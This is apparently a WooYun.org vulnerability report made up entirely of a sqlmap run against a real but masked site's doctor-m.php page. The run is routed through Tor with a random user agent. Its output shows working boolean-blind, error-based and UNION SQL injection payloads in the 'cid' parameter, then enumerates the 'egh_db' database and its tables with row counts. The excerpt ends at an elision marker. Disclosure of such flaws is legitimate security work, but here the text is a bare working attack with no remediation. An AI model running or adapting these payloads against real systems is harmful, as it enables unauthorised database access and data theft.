WooYun.org

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/doctor-m.php?articleid=2&cid1=22&cid=135&" --is-dba --dbs --current-db
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: articleid=2&cid1=22&cid=135 AND 6510=6510&
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: articleid=2&cid1=22&cid=135 AND (SELECT 1887 FROM(SELECT COUNT(*),CONCAT(0x716b787a71,(SELECT (ELT(1887=1887,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&
    Type: UNION query
    Title: MySQL UNION query (N) - 24 columns
    Payload: articleid=2&cid1=22&cid=-2076 UNION ALL SELECT 'N','N','N',CONCAT(0x716b787a71,0x76715a4878444157796c,0x716a716a71),'N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N'#&
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current database:    'egh_db'
current user is DBA:    False
available databases [2]:
[*] egh_db
[*] information_schema
Database: egh_db
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| web_prod2                  | 222     |
| web_news                   | 197     |
| web_prodcategories2        | 120     |
| web_settings               | 104     |
| web_prodfiles2             | 85      |
| web_prod                   | 38      |
| web_prod5                  | 29      |
| web_prod3                  | 22      |
| web_prodfiles3             | 22      |
<......>